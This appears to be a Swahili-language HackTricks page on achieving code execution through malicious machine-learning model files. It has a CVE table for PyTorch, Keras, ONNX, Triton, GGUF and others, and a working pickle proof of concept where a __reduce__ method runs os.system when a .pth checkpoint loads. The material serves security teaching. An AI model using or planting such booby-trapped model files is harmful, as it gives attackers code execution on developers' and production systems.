Models RCE
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na š¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter š¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Loading models to RCE
Machine Learning models mara nyingi hushirikiwa katika mifumo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Mifano hii inaweza kupakuliwa kwenye mashine za waendelezaji au mifumo ya uzalishaji ili kuitumia. Kawaida mifano haipaswi kuwa na msimbo mbaya, lakini kuna baadhi ya kesi ambapo mfano unaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia mfano.
Wakati wa kuandika, haya ni baadhi ya mifano ya aina hii ya udhaifu:
Framework / Tool | Vulnerability (CVE if available) | RCE Vector | References |
---|---|---|---|
PyTorch (Python) | Insecure deserialization in torch.load (CVE-2025-32434) | Malicious pickle in model checkpoint leads to code execution (bypassing weights_only safeguard) | |
PyTorch TorchServe | ShellTorch ā CVE-2023-43654, CVE-2022-1471 | SSRF + malicious model download causes code execution; Java deserialization RCE in management API | |
TensorFlow/Keras | CVE-2021-37678 (unsafe YAML) CVE-2024-3660 (Keras Lambda) | Loading model from YAML uses yaml.unsafe_load (code exec) Loading model with Lambda layer runs arbitrary Python code | |
TensorFlow (TFLite) | CVE-2022-23559 (TFLite parsing) | Crafted .tflite model triggers integer overflow ā heap corruption (potential RCE) | |
Scikit-learn (Python) | CVE-2020-13092 (joblib/pickle) | Loading a model via joblib.load executes pickle with attackerās __reduce__ payload | |
NumPy (Python) | CVE-2019-6446 (unsafe np.load ) disputed | numpy.load default allowed pickled object arrays ā malicious .npy/.npz triggers code exec | |
ONNX / ONNX Runtime | CVE-2022-25882 (dir traversal) CVE-2024-5187 (tar traversal) | ONNX modelās external-weights path can escape directory (read arbitrary files) Malicious ONNX model tar can overwrite arbitrary files (leading to RCE) | |
ONNX Runtime (design risk) | (No CVE) ONNX custom ops / control flow | Model with custom operator requires loading attackerās native code; complex model graphs abuse logic to execute unintended computations | |
NVIDIA Triton Server | CVE-2023-31036 (path traversal) | Using model-load API with --model-control enabled allows relative path traversal to write files (e.g., overwrite .bashrc for RCE) | |
GGML (GGUF format) | CVE-2024-25664 ⦠25668 (multiple heap overflows) | Malformed GGUF model file causes heap buffer overflows in parser, enabling arbitrary code execution on victim system | |
Keras (older formats) | (No new CVE) Legacy Keras H5 model | Malicious HDF5 (.h5 ) model with Lambda layer code still executes on load (Keras safe_mode doesnāt cover old format ā ādowngrade attackā) | |
Others (general) | Design flaw ā Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python pickle.load ) will execute arbitrary code embedded in model files unless mitigated |
Zaidi ya hayo, kuna mifano kadhaa ya python pickle kama zile zinazotumiwa na PyTorch ambazo zinaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo ikiwa hazijapakiwa na weights_only=True
. Hivyo, mfano wowote wa pickle unaweza kuwa na hatari maalum kwa aina hii ya mashambulizi, hata kama haujatajwa kwenye jedwali hapo juu.
Mfano:
- Create the model:
# attacker_payload.py
import torch
import os
class MaliciousPayload:
def __reduce__(self):
# This code will be executed when unpickled (e.g., on model.load_state_dict)
return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))
# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}
# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
- Pakia mfano:
# victim_load.py
import torch
import torch.nn as nn
class MyModel(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(10, 1)
model = MyModel()
# ā ļø This will trigger code execution from pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
# /tmp/pwned.txt is created even if you get an error
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na š¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter š¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.